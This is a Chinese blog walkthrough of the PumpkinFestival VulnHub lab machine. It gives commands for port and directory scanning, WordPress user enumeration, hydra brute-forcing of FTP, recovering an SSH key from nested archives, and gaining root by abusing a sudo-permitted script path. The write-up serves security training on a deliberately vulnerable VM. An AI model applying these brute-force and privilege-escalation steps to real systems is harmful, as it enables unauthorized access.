PumpkinFestival

于 2024-08-14 20:42:44 发布
阅读量376 收藏 14
点赞数 11
分类专栏: vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/141199997
版权

一、信息收集

1、主机发现

导入靶机,开启后在页面显示

192.168.236.177

2、端口扫描

nmap 192.168.236.177 -p- -A

3、目录扫描

dirb http://192.168.236.177

二、漏洞探测

token 1

访问80端口,发现用户

f12查看源码,发现一串token值

PumpkinToken : 45d9ee7239bc6b0bb21d3f8e1c5faa52

token 2

访问 /robots.txt

访问 /tokens ,没有权限,可能存在文件,尝试访问 token.txt ,得到一串token值

PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea

token 3

依次拼接访问,访问 /store/track.txt 时,得到一串值和一个邮箱

Tracking code : 2542 8231 6783 486
admin@pumpkins.local

看到 local ,可能需要绑定hosts,在 hosts 中写入

192.168.236.177 pumpkins.local

访问 pumpkins.local,发现第三个 token

PumpkinToken : 06c3eb12ef2389e2752335beccfb2080

token 4

dirb目录扫描,看到有 wordpress

dirb http://pumpkins.local/

wpscan扫描一下

wpscan --url http://pumpkins.local -e at -e ap -e u

发现两个用户

admin
morse

发现一个 readme.html 文件,访问一下,发现一串字符

http://pumpkins.local/readme.html

K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s

试了试,是base62编码,解码后得到用户morse 和 jack 和一个密码

morse & jack : Ug0t!TrIpyJ

访问 /wp-admin,登录

morse:Ug0t!TrIpyJ

在 profile 下发现第四个token

PumpkinToken : 7139e925fd43618653e51f820bc6201b

token 5

之前 wpscan 扫描时,扫描到一个admin用户,尝试登录失败,密码,试试之前80端口看到的 Alohomora! ,登录成功,发现第五个token

admin:Alohomora!

PumpkinToken : f2e00edc353309b40e1aed18e18ab2c4

token 6

ftp 尝试匿名登录,登录成功

ftp 192.168.236.177
anonymous

在 secret 下发现 token.txt ,下载下来,查看文件,得到第六个 token

get token.txt
cat token.txt

PumpkinToken : 2d6dbbae84d724409606eddd9dd71265

token 7

目前还剩 harry 用户密码没有获取,尝试破解,使用 hydra 工具,得到密码 yrrah

hydra -l harry -P /usr/share/wordlists/rockyou.txt 192.168.236.177 ftp -e nsr

harry:yrrah

登录 ftp ,发现 token.txt

ftp 192.168.236.177

harry:yrrah

将文件下载下来查看,得到第七个 token

get token.txt
cat token.txt

PumpkinToken : ba9fa9abf2be9373b7cbd9a6457f374e

token 8

目录 Donotopen 中,一通遍历,发现 token.txt,下载查看,得到第八个 token

PumpkinToken : f9c5053d01e0dfc30066476ab0f0564c

三、GetShell

还有个 NOOOOO 目录,进入后,再次进入 NOOOOOO 目录,发现一个 data.txt

下载查看,发现是乱码

查看文件类型,是一个 tar 压缩包

file data.txt

解压,最后 jack 为十六进制文件

tar vxf data.txt
tar xjf data
tar vxf key
cat jack

使用 xxd 将 hexdump 转换,得到一个私钥

xxd -r -p jack

复制内容至 a,赋予权限后,进行 ssh 连接,连接成功

chmod 600 a
ssh -i a jack@192.168.236.177 -p 6880

四、提权

token 9

查看当前目录,发现一个 token,查看为乱码

查看文件类型

file token


执行命令,得到第九个token

./token

PumpkinToken : 8d66ef0055b43d80c34917ec6c75f706

查看具有root权限的命令

sudo -l
Ug0t!TrIpyJ

pumpkins 目录下 alohomora 文件有root权限

创建 pumpkins 目录并创建 alohomora 文件,赋予权限并写入 /bin/bash,sudo执行,提权成功

mkdir pumpkins
cd pumpkins
vi alohomora
/bin/bash

chmod 777 alohomora
sudo ./alohomora

切换到 /root 目录下,发现最后的文件

token 10

最后在 license.txt 中还有一个token

PumpkinToken : 5ff346114d634a015ce413e1bc3d8d71

花椒椒椒
关注
  • 11
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PumpkinFestival靶机
zdd1453691081的博客
08-09 585
cat jack。
学习笔记-PumpkinFestival-WalkThrough
人饭子的博客
11-04 433
PumpkinFestival-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 靶机地址 https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/ Description Mission-Pumpkin v1.0 is...
PumpkinFestival 打靶渗透
m0_65112983的博客
08-04 1089
PumpkinFestival 打靶渗透
南瓜节(PumpkinFestival)| 终极南瓜系列挑战
siaowei44的博客
07-17 858
概述 南瓜系列的第三关:南瓜节(PumpkinFestival) 下载链接:https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/ 靶机ip:192.168.74.193 攻击主机ip:192.168.74.128 渗透过程 首先内网扫描到靶机 然后对其进行nmap扫描,扫描其端口 信息搜集过程 (一)80端口网页 用dirb扫描一下网页目录 看看robots.txt文件 依次访问这
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8388
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
韦东山imx6ullpro完全开发书册
08-15
韦东山imx6ullpro完全开发书册
使用html+css +js 实现天猫首页效果.zip
08-15
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无积分,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于收集和整理资料耗费时间的酬劳
Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目)
08-15
Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。 Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。 Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。 Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课
JavaWeb实现超市订单管理系统smbms.zip
08-15
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无积分,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于收集和整理资料耗费时间的酬劳
未来社区及其趋势探索(戴德梁行)PDF(52页).pdf
08-15
未来社区的建设背景和需求分析指出,随着智能经济、大数据、人工智能、物联网、区块链、云计算等技术的发展,社区服务正朝着数字化、智能化转型。社区服务渠道由分散向统一融合转变,服务内容由通用庞杂向个性化、服务导向转变。未来社区将构建数字化生态,实现数据在线、组织在线、服务在线、产品智能和决策智能,赋能企业创新,同时注重人才培养和科研平台建设。 规划设计方面,未来社区将基于居民需求,打造以服务为中心的社区管理模式。通过统一的服务平台和应用,实现服务内容的整合和优化,提供灵活多样的服务方式,如推送式、订阅式、热点式等。社区将构建数据与应用的良性循环,提高服务效率,同时注重生态优美、绿色低碳、社会和谐,以实现幸福民生和产业发展。 建设运营上,未来社区强调科学规划、以人为本,创新引领、重点突破,统筹推进、整体提升。通过实施院落+社团自治工程,转变政府职能,深化社区自治法制化、信息化,解决社区治理中的重点问题。目标是培养有活力的社会组织,提高社区居民参与度和满意度,实现社区治理服务的制度机制创新。 未来社区的数字化解决方案包括信息发布系统、服务系统和管理系统。信息发布系统涵盖公共服务类和社会化服务类信息,提供政策宣传、家政服务、健康医疗咨询等功能。服务系统功能需求包括办事指南、公共服务、社区工作参与互动等,旨在提高社区服务能力。管理系统功能需求则涉及院落管理、社团管理、社工队伍管理等,以实现社区治理的现代化。 最后,未来社区建设注重整合政府、社会组织、企业等多方资源,以提高社区服务的效率和质量。通过建立社区管理服务综合信息平台,提供社区公共服务、社区社会组织管理服务和社区便民服务,实现管理精简、高效、透明,服务快速、便捷。同时,通过培育和发展社区协会、社团等组织,激发社会化组织活力,为居民提供综合性的咨询和服务,促进社区的和谐发展。
AuToGraFS-2.3.1-py3-none-any.whl.zip
08-15
AuToGraFS-2.3.1-py3-none-any.whl.zip
JSP-基于web的工厂新闻管理系统(源码+数据库+论文).rar
08-15
首先,论文简要介绍了工厂新闻管理系统的背景和本次开发过程会使用的一些技术并且介绍了一下,技术包括有当前做系统毕竟流行的java语言,以及jsp技术,同样在开发web类系统也少不了我们神奇的SSM框架,最后使用近年势头很猛的免费数据库mysql作为本论文使用的数据库。随后我叙述了这个系统的绣球分析,并画出了主要的流程图,功能分析同时给出了相应的功能模块图,最后进行了小恒他的分析,包括系统设计和数据库分析,并且给出了本次系统的主要ER结构;系统实现主要是使用SSM框架、JSP和MySQL数据库实现系统功能;系统测试主要是对系统的功能和性能进行测试,保证系统的稳定性和可靠性。 本论文的主要贡献在于提出了基于SSM框架、JSP和MySQL数据库的工厂新闻管理系统,该系统能够实现工厂内部新闻的发布和管理,提高了工厂内部信息交流和管理的效率和准确性。此外,该系统还具有可扩展性和灵活性,可以根据不同的工厂需求进行个性化定制。 总之,基于Web的工厂新闻管理系统具有重要的应用价值和发展前景。未来,可以通过进一步完善系统功能和提高系统性能等方面的改进,进一步提高该系统的实用性和适用性
最详细最傻瓜的git使用教程最详细最傻瓜的git使用教程
最新发布
08-15
最详细最傻瓜的git使用教程最详细最傻瓜的git使用教程
AuToGraFS-2.3.2-py3-none-any.whl.zip
08-15
AuToGraFS-2.3.2-py3-none-any.whl.zip
111111111111111111111
08-15
111111111111111111111
数学建模MATLAB代码神经网络算法代码可直接运行
08-15
数学建模MATLAB代码神经网络算法代码可直接运行
毕业设计asp.net教学网站-qkrp源码含文档工具包
08-15
毕业设计asp.net教学网站-qkrp源码含文档工具包 asp.net,数据库sqlserver,开发工具用Microsoft Visual Studio 作业管理 公告管理 交流模块管理 资源管理 密码修改 账号管理 记录添加,删除,修改 包含:源码、数据库脚本、论文、环境工具包(在说明文档中)
爬虫程序3.zip
08-15
爬虫程序3
YOLO 目标检测图像数据集:牙齿缺陷检测
08-15
YOLO 目标检测图像数据集:牙齿缺陷检测【包含训练集、验证集、对应标签、class文件】 数据集被处理成yolo格式,可以用于YOLO所有系列的网络训练。show脚本可以用于可视化数据,即将box目标绘制在图像上 类别个数(2):defect、normal【具体类别参考class类别文本文件】超过400张数据和用labelme标注的标签文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值